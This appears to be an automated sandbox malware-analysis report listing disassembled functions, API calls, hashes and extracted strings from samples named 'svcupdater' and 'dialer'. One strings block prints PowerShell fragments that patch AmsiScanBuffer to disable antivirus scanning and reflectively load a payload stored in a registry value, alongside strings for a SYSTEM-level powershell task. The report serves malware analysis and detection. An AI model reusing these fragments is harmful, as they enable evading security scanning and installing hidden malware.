                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1913693674-0
                                                                                                    • Opcode ID: 15b75038a5fe9fbedc9ebc25d5ce344ad1dd64d266f886930d976ac9e43b8531
                                                                                                    • Instruction ID: 6345dd31c8fcd7661c60e82b6758242b42bd6845d4a960e1fc532c3d5f482aec
                                                                                                    • Opcode Fuzzy Hash: 15b75038a5fe9fbedc9ebc25d5ce344ad1dd64d266f886930d976ac9e43b8531
                                                                                                    • Instruction Fuzzy Hash: A221957160421AAFDB10BFE5CC80A7BB7A9FF453647108559F929D7292E730EE40DB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 43496de0578851cb324a915dbd1d008d298fc5ab402cd439cb6ed902c185c550
                                                                                                    • Instruction ID: c202ee622097f7d321b022644d7f0720d63f61c0187ffa677dd33e1e5258c64b
                                                                                                    • Opcode Fuzzy Hash: 43496de0578851cb324a915dbd1d008d298fc5ab402cd439cb6ed902c185c550
                                                                                                    • Instruction Fuzzy Hash: 9821D13160021FEF9B20AF70CC8097AB7E9EF50364B1045B5FA25A7151EB31ED5987A0
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00C0AE9B
                                                                                                      • Part of subcall function 00C09AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00C08296,?,00000000,-00000008), ref: 00C09B8D
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C0AED3
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C0AEF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 158306478-0
                                                                                                    • Opcode ID: 5807dc69d51c2089e0a5ccf6c6ae956f2f328f1e41c94ceb27dc85e5b3e69336
                                                                                                    • Instruction ID: 3cf10ffef8abf8d3a19dfd82023f38adb7d8e1816a514910e8bf1ae146419b94
                                                                                                    • Opcode Fuzzy Hash: 5807dc69d51c2089e0a5ccf6c6ae956f2f328f1e41c94ceb27dc85e5b3e69336
                                                                                                    • Instruction Fuzzy Hash: B611D6F6609716FEE71127F6AC89EAF7D6CEE8A3943100115F501D1181FA34DE02E6B2
                                                                                                    APIs
                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00C0E222,00000000,00000001,00000000,00000000,?,00C03015,00000000,00000000,00000000), ref: 00C11D5E
                                                                                                    • GetLastError.KERNEL32(?,00C0E222,00000000,00000001,00000000,00000000,?,00C03015,00000000,00000000,00000000,00000000,00000000,?,00C035D3,00000000), ref: 00C11D6A
                                                                                                      • Part of subcall function 00C11D30: CloseHandle.KERNEL32(FFFFFFFE,00C11D7A,?,00C0E222,00000000,00000001,00000000,00000000,?,00C03015,00000000,00000000,00000000,00000000,00000000), ref: 00C11D40
                                                                                                    • ___initconout.LIBCMT ref: 00C11D7A
                                                                                                      • Part of subcall function 00C11CF2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00C11D21,00C0E20F,00000000,?,00C03015,00000000,00000000,00000000,00000000), ref: 00C11D05
                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00C0E222,00000000,00000001,00000000,00000000,?,00C03015,00000000,00000000,00000000,00000000), ref: 00C11D8F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                    • String ID:
                                                                                                    • API String ID: 2744216297-0
                                                                                                    • Opcode ID: 8d8b17843e1e956c5af39366a158535e94591efc44c86d6bb75151458e5c86d1
                                                                                                    • Instruction ID: b68b093c1ec86a69207bff1890e7a1daed5cab494492fa8dbb5877c0e2c930b2
                                                                                                    • Opcode Fuzzy Hash: 8d8b17843e1e956c5af39366a158535e94591efc44c86d6bb75151458e5c86d1
                                                                                                    • Instruction Fuzzy Hash: 44F0F836010569FBCF222FD1AC05BEE3F26FF4A3A0B058010FE1985520CA3289A0AB90
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00BFEE0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 45b8dee22d68e22c01ada62e5cc56735e1e055fdc5cc65187fb462b43817cf2b
                                                                                                    • Instruction ID: 336d09e0d9c61a2efbbc162f58099ee74920631b07c5a0972bb791fbbb6e4247
                                                                                                    • Opcode Fuzzy Hash: 45b8dee22d68e22c01ada62e5cc56735e1e055fdc5cc65187fb462b43817cf2b
                                                                                                    • Instruction Fuzzy Hash: C8517C61E0910986DB127B14DD513BE7BD4EB40700F2489A8F1B6432FAEB34CD99DA46
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00BE3ABF
                                                                                                      • Part of subcall function 00BF691B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00BF418F,?,00C23B78,00BE2904,string too long,00BE2904,?,?,?), ref: 00BF697B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                    • String ID: ios_base::badbit set$ios_base::failbit set
                                                                                                    • API String ID: 3109751735-1240500531
                                                                                                    • Opcode ID: 96e04039c1126bb58793bef73449c5fe671eddd6a119534d0fcba0007c481736
                                                                                                    • Instruction ID: 6c0eaf4f53046052a08a3446f80f6dd10daee2c5cb744cdbcab059c88ae7dd07
                                                                                                    • Opcode Fuzzy Hash: 96e04039c1126bb58793bef73449c5fe671eddd6a119534d0fcba0007c481736
                                                                                                    • Instruction Fuzzy Hash: A75149B1910248ABCB04CF59CC45BAEF7F8EF45710F1482AEF95497781E770AA44CBA0
                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00BF8ED4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                    • Opcode ID: bc18c26ba3bc47b91592955da364c273b4bbfe180e2dada28ac3098f31d3f511
                                                                                                    • Instruction ID: bd59f86cf4483768e9021cc90d9297cc9bdd1b03a03d03118413354154292281
                                                                                                    • Opcode Fuzzy Hash: bc18c26ba3bc47b91592955da364c273b4bbfe180e2dada28ac3098f31d3f511
                                                                                                    • Instruction Fuzzy Hash: FE413A7290020DAFCF16DF94CC81AAE7BF6FF48304F148599FA0467211D7359A54DB91

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:78.9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:29.5%
                                                                                                    Total number of Nodes:105
                                                                                                    Total number of Limit Nodes:7

                                                                                                    Callgraph

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FindResourceExA.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1964
                                                                                                    • SizeofResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC197B
                                                                                                    • LoadResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1990
                                                                                                    • LockResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19A2
                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19CC
                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19F6
                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1A25
                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1A4F
                                                                                                      • Part of subcall function 00007FF790DC1ADC: GetProcessHeap.KERNEL32 ref: 00007FF790DC1AF0
                                                                                                      • Part of subcall function 00007FF790DC1ADC: HeapAlloc.KERNEL32 ref: 00007FF790DC1B01
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCpyW.SHLWAPI ref: 00007FF790DC1B14
                                                                                                      • Part of subcall function 00007FF790DC1ADC: VerSetConditionMask.NTDLL ref: 00007FF790DC1B76
                                                                                                      • Part of subcall function 00007FF790DC1ADC: VerSetConditionMask.NTDLL ref: 00007FF790DC1B87
                                                                                                      • Part of subcall function 00007FF790DC1ADC: VerSetConditionMask.NTDLL ref: 00007FF790DC1B98
                                                                                                      • Part of subcall function 00007FF790DC1ADC: VerifyVersionInfoW.KERNEL32 ref: 00007FF790DC1BAB
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1BBF
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1BDA
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1BEA
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1BFA
                                                                                                      • Part of subcall function 00007FF790DC1ADC: StrCatW.SHLWAPI ref: 00007FF790DC1C0A
                                                                                                      • Part of subcall function 00007FF790DC17A4: SysAllocString.OLEAUT32 ref: 00007FF790DC17C0
                                                                                                      • Part of subcall function 00007FF790DC17A4: SysAllocString.OLEAUT32 ref: 00007FF790DC17D0
                                                                                                      • Part of subcall function 00007FF790DC17A4: CoInitializeEx.COMBASE ref: 00007FF790DC17DD
                                                                                                      • Part of subcall function 00007FF790DC17A4: CoInitializeSecurity.COMBASE ref: 00007FF790DC1814
                                                                                                      • Part of subcall function 00007FF790DC17A4: CoCreateInstance.COMBASE ref: 00007FF790DC1859
                                                                                                      • Part of subcall function 00007FF790DC17A4: VariantInit.OLEAUT32 ref: 00007FF790DC186B
                                                                                                      • Part of subcall function 00007FF790DC17A4: CoUninitialize.COMBASE ref: 00007FF790DC1904
                                                                                                      • Part of subcall function 00007FF790DC17A4: SysFreeString.OLEAUT32 ref: 00007FF790DC190D
                                                                                                      • Part of subcall function 00007FF790DC17A4: SysFreeString.OLEAUT32 ref: 00007FF790DC1916
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC1184
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC1190
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC11A0
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC11AC
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC11BC
                                                                                                      • Part of subcall function 00007FF790DC1154: SysAllocString.OLEAUT32 ref: 00007FF790DC11CC
                                                                                                      • Part of subcall function 00007FF790DC1154: CoInitializeEx.COMBASE ref: 00007FF790DC11D9
                                                                                                      • Part of subcall function 00007FF790DC1154: CoInitializeSecurity.COMBASE ref: 00007FF790DC1210
                                                                                                      • Part of subcall function 00007FF790DC1154: CoCreateInstance.COMBASE ref: 00007FF790DC1252
                                                                                                      • Part of subcall function 00007FF790DC1154: VariantInit.OLEAUT32 ref: 00007FF790DC1264
                                                                                                      • Part of subcall function 00007FF790DC15CC: SysAllocString.OLEAUT32 ref: 00007FF790DC15E2
                                                                                                      • Part of subcall function 00007FF790DC15CC: SysAllocString.OLEAUT32 ref: 00007FF790DC15F2
                                                                                                      • Part of subcall function 00007FF790DC15CC: CoInitializeEx.OLE32 ref: 00007FF790DC15FF
                                                                                                      • Part of subcall function 00007FF790DC15CC: CoInitializeSecurity.COMBASE ref: 00007FF790DC1636
                                                                                                      • Part of subcall function 00007FF790DC15CC: CoCreateInstance.COMBASE ref: 00007FF790DC1676
                                                                                                      • Part of subcall function 00007FF790DC15CC: VariantInit.OLEAUT32 ref: 00007FF790DC1688
                                                                                                      • Part of subcall function 00007FF790DC15CC: VariantInit.OLEAUT32 ref: 00007FF790DC1718
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$Alloc$Initialize$InitResourceVariant$ConditionCreateInstanceMaskSecurity$FreeHeapOpenValue$FindInfoLoadLockProcessSizeofUninitializeVerifyVersion
                                                                                                    • String ID: C:\Windows\SysWOW64\WindowsPowerShell\v1.0$EXE$SOFTWARE$dialerstager$dialersvc32$dialersvc64
                                                                                                    • API String ID: 1090849789-1656134131
                                                                                                    • Opcode ID: a945f6bfb5c0a11c5a6d1c3122d6ff3d9680862ac37ed9327692272a4eff5ead
                                                                                                    • Instruction ID: 51824c3fad0c3bc6020983e417b2c0853d9e82f43369ed50d0816ac767695c4e
                                                                                                    • Opcode Fuzzy Hash: a945f6bfb5c0a11c5a6d1c3122d6ff3d9680862ac37ed9327692272a4eff5ead
                                                                                                    • Instruction Fuzzy Hash: 4841BD29A2963241EE30BF31A8111B9E3A5BF49780FC82135D90E47794EE3CF509D7A0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 4184240511-0
                                                                                                    • Opcode ID: a3b3855170ba43f7dd2c44b82ea8c5689a5c3093f9a56b22b548aa88aae08d85
                                                                                                    • Instruction ID: 2636428802aae6a29d5ebb2e08dc12009578a643401f78732bc42683ede59bc4
                                                                                                    • Opcode Fuzzy Hash: a3b3855170ba43f7dd2c44b82ea8c5689a5c3093f9a56b22b548aa88aae08d85
                                                                                                    • Instruction Fuzzy Hash: 4B419D36B14A9696E7209F39D4452ADB3B1FF89B88F446135EE4E43B24DF38E149D340

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                    • String ID: Microsoft Base Cryptographic Provider v1.0
                                                                                                    • API String ID: 1815803762-291530887
                                                                                                    • Opcode ID: ae5b0d10a8788360585257c4ad82d0f7a0762030508e0468c0f33aa88bdcd6dc
                                                                                                    • Instruction ID: f60785dc01f7e92edaafc62b41b08c64efeec52dd70e3814dc1a9ecc1d40977d
                                                                                                    • Opcode Fuzzy Hash: ae5b0d10a8788360585257c4ad82d0f7a0762030508e0468c0f33aa88bdcd6dc
                                                                                                    • Instruction Fuzzy Hash: 0D014B26B14B5086E7109F76E8441AAB7A0FBC8F80F898035CE5D43718CF78E446A750

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ConditionMask$Heap$AllocInfoProcessVerifyVersion
                                                                                                    • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`dialerstager`)).EntryPoint.I$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                                                                    • API String ID: 2029100085-2228522184
                                                                                                    • Opcode ID: 27e785f148f77e327b5555b98a8ea3dd4624678508d9bfb0ab5c46e766a0de7d
                                                                                                    • Instruction ID: 64e943c8c426298d49c4baea827a589751936610531709dc29c1bb7673729400
                                                                                                    • Opcode Fuzzy Hash: 27e785f148f77e327b5555b98a8ea3dd4624678508d9bfb0ab5c46e766a0de7d
                                                                                                    • Instruction Fuzzy Hash: A351FD69A28BA390EA24FB35F8552E5A365AF46781FC47031D80E06365DF7CF109D7E0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree$lstrlen
                                                                                                    • String ID: '+'$'+[Char]($)+'$gfff$gfff
                                                                                                    • API String ID: 1876416331-3743437565
                                                                                                    • Opcode ID: 87fd0c68318a3f68055d8be463de6c46affc1a5547d336f3b281c1e5bd1d7d37
                                                                                                    • Instruction ID: 299eacd4616941ca57f7bffef4b66e9fc21ee385e7fe91a5f11cc3f73c849a47
                                                                                                    • Opcode Fuzzy Hash: 87fd0c68318a3f68055d8be463de6c46affc1a5547d336f3b281c1e5bd1d7d37
                                                                                                    • Instruction Fuzzy Hash: DD81F226B24A7285EB24EF76E8155B8A365FF45B88B846039DD0E43B64DF3CF409D350

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 66 7ff790dc1154-7ff790dc11e1 SysAllocString * 6 CoInitializeEx 67 7ff790dc1571-7ff790dc15c9 SysFreeString * 6 66->67 68 7ff790dc11e7-7ff790dc1221 CoInitializeSecurity 66->68 69 7ff790dc122f-7ff790dc125a CoCreateInstance 68->69 70 7ff790dc1223-7ff790dc1229 68->70 71 7ff790dc156b CoUninitialize 69->71 72 7ff790dc1260-7ff790dc12b9 VariantInit 69->72 70->69 70->71 71->67 74 7ff790dc1560-7ff790dc1565 72->74 75 7ff790dc12bf-7ff790dc12d7 72->75 74->71 75->74 77 7ff790dc12dd-7ff790dc12fa 75->77 79 7ff790dc1300-7ff790dc1317 77->79 80 7ff790dc1556-7ff790dc155a 77->80 82 7ff790dc1549-7ff790dc1550 79->82 83 7ff790dc131d-7ff790dc132f 79->83 80->74 82->80 85 7ff790dc153f-7ff790dc1543 83->85 86 7ff790dc1335-7ff790dc134e 83->86 85->82 86->85 88 7ff790dc1354-7ff790dc1370 86->88 90 7ff790dc1376-7ff790dc1391 88->90 91 7ff790dc1534-7ff790dc1539 88->91 93 7ff790dc1529-7ff790dc152e 90->93 94 7ff790dc1397-7ff790dc13b3 90->94 91->85 93->91 96 7ff790dc151f-7ff790dc1523 94->96 97 7ff790dc13b9-7ff790dc13d2 94->97 96->93 99 7ff790dc1514-7ff790dc1519 97->99 100 7ff790dc13d8-7ff790dc13f5 97->100 99->96 102 7ff790dc1509-7ff790dc150e 100->102 103 7ff790dc13fb-7ff790dc140b 100->103 102->99 105 7ff790dc1411-7ff790dc1421 103->105 106 7ff790dc14fe-7ff790dc1503 103->106 105->106 108 7ff790dc1427-7ff790dc1437 105->108 106->102 108->106 110 7ff790dc143d-7ff790dc14e0 VariantInit * 3 108->110 111 7ff790dc14eb-7ff790dc14ed 110->111 111->106 112 7ff790dc14ef-7ff790dc14f8 111->112 112->106
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                                                                                                    • String ID: SYSTEM$powershell
                                                                                                    • API String ID: 3960698109-2482694968
                                                                                                    • Opcode ID: acb5b600baeec5b07b312a6db0af3136a0ba7a913fa333411818defa5453bea8
                                                                                                    • Instruction ID: 5aa2e6a767ed1771da1e99b90f883ce6c000bb225bdf2d7fadb1e1edb198bef1
                                                                                                    • Opcode Fuzzy Hash: acb5b600baeec5b07b312a6db0af3136a0ba7a913fa333411818defa5453bea8
                                                                                                    • Instruction Fuzzy Hash: EDD13736B14BA686EB10DF7AE84419DB7B4FB84B88B405132DE4E47B28DF39E049C350

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2407135876-0
                                                                                                    • Opcode ID: 95c8ef1e0f399922a78404bf503d733f13d0a57ba047e01ab0114964292ddd94
